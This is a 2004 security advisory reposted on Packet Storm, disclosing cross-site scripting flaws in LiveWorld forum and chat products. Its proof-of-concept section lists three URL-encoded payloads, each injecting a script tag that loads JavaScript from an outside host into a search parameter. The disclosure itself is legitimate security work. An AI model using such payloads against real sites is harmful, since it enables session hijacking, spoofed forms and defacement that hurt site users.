exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

00044-08232004.txt

00044-08232004.txt
Posted Aug 26, 2004
Authored by James Bercegay | Site gulftech.org

GulfTech Security Advisory - Multiple Liveworld products suffer from cross site scripting flaws.

tags | advisory, xss
SHA-256 | ebc7c3c7aae2e82bed1c14b4ed71a11fb9c443b20dfa4e4c5326466ff63aae6e

00044-08232004.txt

Change Mirror Download
##########################################################
# GulfTech Security Research August, 23rd 2004
##########################################################
# Vendor : LiveWorld, Inc.
# URL : http://www.liveworld.com
# Version : Multiple Products
# Risk : Cross Site Scripting
##########################################################

Description:
LiveWorld provides collaborative services for online meetings,
customer care, and loyalty marketing. Supporting communication
between a company and its customers, employees, or partners
and among those people themselves - our services help corpor-
ations cut costs, increase revenue, and solidify relationships
with groups critical to their success. LiveWorld products are
used on major websites such as HBO, eBay, and others.



Cross Site Scripting:
GulfTech Security Research have discovered Cross Site Scripting
issues that are believed to be present in multiple LiveWorld Inc
products such as LiveForum, LiveQ&A, LiveChat and LiveFocusGroup.
It is also a good possibility that this issue exists in other
LiveWorld products as they "seem" to share some of the same code.
If you believe this to be incorrect, or have proof of it being
100% accurate then please let us know. These issues could allow
for an attacker to run code in the context of a victims browser
or temporarily deface a website that is running any of the
affected applications.



Proof Of Concept:
I have done my best to contact LiveWorld, and eBay. As of the
time I am writing this, the holes are not patched, and these
examples work. However this may not be the case when this write
up becomes public. Please note that these URI's are wrapped for
the sake of readability.

http://answercenter.xxxx.com/search.jsp?q=%22%3E%3Cscript+src%3D
%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscript
%3E%3C%21--%3C%21--

http://groups.xxxx.com/findclub!execute.jspa?q=%22%3E%3Cscript+s
rc%3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fs
cript%3E%3C%21--%3C%21--

http://boards.xxx.com/search!execute.jspa?q=%22%3E%3Cscript+src%
3D%22http%3A%2F%2Fstuff.gulftech.org%2Ffoobar.js%22%3E%3C%2Fscri
pt%3E%3C%21--%3C%21--

These examples simply print the GulfTech name to the browser, but
this could just as easily be a spoofed form, or a malicious script.

Edit: I have edited out the real web addresses.



Solution:
LiveWorld Inc was contacted about these issues, but has not yet
responded. Perhaps they will see this advisory and fix the holes :)
Any future fix will likely be posted on their website.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00044-08232004



Credits:
James Bercegay of the GulfTech Security Research Team
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close